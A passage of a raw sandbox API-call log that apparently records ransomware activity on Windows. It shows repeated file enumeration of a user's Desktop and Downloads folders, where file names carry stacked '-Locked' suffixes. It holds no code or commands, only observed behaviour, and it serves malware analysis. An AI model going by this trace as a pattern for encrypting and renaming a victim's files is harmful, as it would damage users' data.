lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36452403, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36452403, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36452403, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked-Locked", cAlternateFileName="STLRGM~2.FLV")) returned 1 [0309.998] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328c165b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328c165b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328c165b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked", cAlternateFileName="TMHBBP~1.MP4")) returned 1 [0309.998] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364598c3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364598c3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364598c3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked-Locked", cAlternateFileName="TMHBBP~2.MP4")) returned 1 [0309.998] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d28c0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328d28c0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328d28c0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked", cAlternateFileName="TUJLYX~2.MP4")) returned 1 [0309.998] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3645fa98, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3645fa98, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3645fa98, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked-Locked", cAlternateFileName="TUJLYX~1.MP4")) returned 1 [0309.999] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328e38e5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328e38e5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328e38e5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked", cAlternateFileName="V0ZO8W~2.JPG")) returned 1 [0309.999] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364649d0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364649d0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364649d0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked", cAlternateFileName="V0ZO8W~1.JPG")) returned 1 [0309.999] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f37f9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328f37f9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328f37f9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked", cAlternateFileName="VL-8WX~1.PNG")) returned 1 [0309.999] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36476736, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36476736, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36476736, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked-Locked", cAlternateFileName="VL-8WX~2.PNG")) returned 1 [0309.999] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329021a3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329021a3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329021a3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked", cAlternateFileName="WJV4VO~2.GIF")) returned 1 [0309.999] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3647dc3b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3647dc3b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3647dc3b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked-Locked", cAlternateFileName="WJV4VO~1.GIF")) returned 1 [0310.000] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32913273, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32913273, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32913273, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 1 [0310.000] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36485145, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked-Locked", cAlternateFileName="Y4HQQH~1.PDF")) returned 1 [0310.000] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0310.000] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0310.000] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x36560d0c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36560d0c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0310.001] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x36560d0c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36560d0c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0310.001] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364d20c3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364d20c3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364d20c3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="E ZB4hlMv59fpDjUh6qT.m4a-Locked-Locked", cAlternateFileName="EZB4HL~1.M4A")) returned 1 [0310.005] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364dbc35, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364dbc35, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364dbc35, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eKq_zA-WA.mkv-Locked-Locked", cAlternateFileName="EKQ_ZA~1.MKV")) returned 1 [0310.005] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364e327e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364e327e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364e327e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iTP31jJvGR0dsUQ.wav-Locked-Locked", cAlternateFileName="ITP31J~1.WAV")) returned 1 [0310.005] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364eba08, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364eba08, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364eba08, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ixYbal.avi-Locked-Locked", cAlternateFileName="IXYBAL~2.AVI")) returned 1 [0310.005] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364f3016, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364f3016, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364f3016, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S sEwkyDOda_C3BxCH.ppt-Locked-Locked", cAlternateFileName="SSEWKY~1.PPT")) returned 1 [0310.005] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364fb7b1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364fb7b1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364fb7b1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ujk4snw9z16p4ofDz.mp4-Locked-Locked", cAlternateFileName="UJK4SN~1.MP4")) returned 1 [0310.005] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36505424, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36505424, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36505424, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YZL8R176sHB.swf-Locked-Locked", cAlternateFileName="YZL8R1~1.SWF")) returned 1 [0310.005] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36505424, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36505424, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36505424, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YZL8R176sHB.swf-Locked-Locked", cAlternateFileName="YZL8R1~1.SWF")) returned 0 [0310.005] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0310.006] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\*", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x36560d0c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36560d0c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0310.006] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x36560d0c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36560d0c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0310.006] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364d20c3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364d20c3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364d20c3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="E ZB4hlMv59fpDjUh6qT.m4a-Locked-Locked", cAlternateFileName="EZB4HL~1.M4A")) returned 1 [0310.006] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364dbc35, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364dbc35, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364dbc35, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eKq_zA-WA.mkv-Locked-Locked", cAlternateFileName="EKQ_ZA~1.MKV")) returned 1 [0310.007] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364e327e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364e327e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364e327e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iTP31jJvGR0dsUQ.wav-Locked-Locked", cAlternateFileName="ITP31J~1.WAV")) returned 1 [0310.007] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364eba08, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364eba08, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364eba08, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ixYbal.avi-Locked-Locked", cAlternateFileName="IXYBAL~2.AVI")) returned 1 [0310.007] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364f3016, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364f3016, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364f3016, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S sEwkyDOda_C3BxCH.ppt-Locked-Locked", cAlternateFileName="SSEWKY~1.PPT")) returned 1 [0310.007] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364fb7b1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364fb7b1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364fb7b1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ujk4snw9z16p4ofDz.mp4-Locked-Locked", cAlternateFileName="UJK4SN~1.MP4")) returned 1 [0310.007] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36505424, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36505424, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36505424, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YZL8R176sHB.swf-Locked-Locked", cAlternateFileName="YZL8R1~1.SWF")) returned 1 [0310.007] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0310.007] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0310.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af1d0) returned 1 [0310.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af1dc) returned 1 [0310.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af210) returned 1 [0310.007] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\", nBufferLength=0x105, lpBuffer=0x1aed18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads\\", lpFilePart=0x0) returned 0x20 [0310.007] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\", nBufferLength=0x105, lpBuffer=0x1aecec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads\\", lpFilePart=0x0) returned 0x20 [0310.008] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*", lpFindFileData=0x1aef38 | out: lpFindFileData=0x1aef38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34b9bb1b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36c70a86, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0310.008] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0310.008] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36c70a86, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36c70a86, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0310.008] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36c70a86, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36c70a86, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0310.009] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36c65ada, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36c65ada, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36c65ada, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked", cAlternateFileName="DESKTO~2.INI")) returned 1 [0310.009] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36c65ada, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36c65ada, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36c65ada, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked", cAlternateFileName="DESKTO~2.INI")) returned 0 [0310.009] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0310.009] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36c70a86, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36c70a86, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0310.009] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36c70a86, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36c70a86, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0310.009] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36c65ada, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36c65ada, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36c65ada, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked", cAlternateFileName="DESKTO~2.INI")) returned 1 [0310.009] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0310.010] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0310.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af1d0) returned 1 [0310.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af1dc) returned 1 [0310.010] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: 